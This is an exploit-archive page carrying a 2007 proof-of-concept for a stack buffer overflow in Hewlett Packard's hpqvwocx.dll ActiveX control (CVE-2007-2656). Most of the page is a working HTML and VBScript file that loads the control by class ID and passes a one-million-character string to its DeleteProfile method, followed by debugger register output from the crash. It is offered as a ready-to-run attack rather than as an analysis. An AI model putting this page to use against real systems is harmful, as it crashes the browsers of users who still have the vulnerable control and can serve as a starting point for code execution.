[] NeoSense
E X P L O I T S
title author type platform port cve id

Hewlett Packard 1.0.0.309 - 'hpqvwocx.dll' ActiveX Magview Overflow (PoC)

Author: callAX
type: dos
platform: windows
port: 
date_added: 2007-05-10 
date_updated:  
verified: 1 
codes: OSVDB-37787;CVE-2007-2656 
tags: 
aliases:  
screenshot_url:  
application_url: 
<html>

<head>

 <title>

  Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309

 </title>

</head>



<h4>Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309<br>

Tested in Windows XP Service Pack 2<br>

Discovered by Goodfellas Security Research Team<br>

Url ->http://www.hp.com<br> author -> callAX<br>mail -> callax@shellcode.com.ar<br>

http://www.shellcode.com.ar / http://www.securenetworks.ch</h4>



<object classid='clsid:BA726BF9-ED2F-461B-9447-CD5C7D66CE8D' id='pAF' ></object>



<input type="button" value="Boom" language="VBScript" OnClick="OuCh()">



<script language="VBScript">



sub OuCh()



 Var_0 = String(1000000, "A")



 pAF.DeleteProfile Var_0



End Sub





</script>



</html>



<!--



Tested in OllyDBG 1.08b



TEST DWORD PTR DS:[ECX],EAX



EAX -> 000ED484

ECX -> 000425F4

EDX -> 00000000

EBX -> 00000000

EIP  -> 04B47B97



Sub DeleteProfile (

            ByVal Name  As String

)



-->

# milw0rm.com [2007-05-11]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.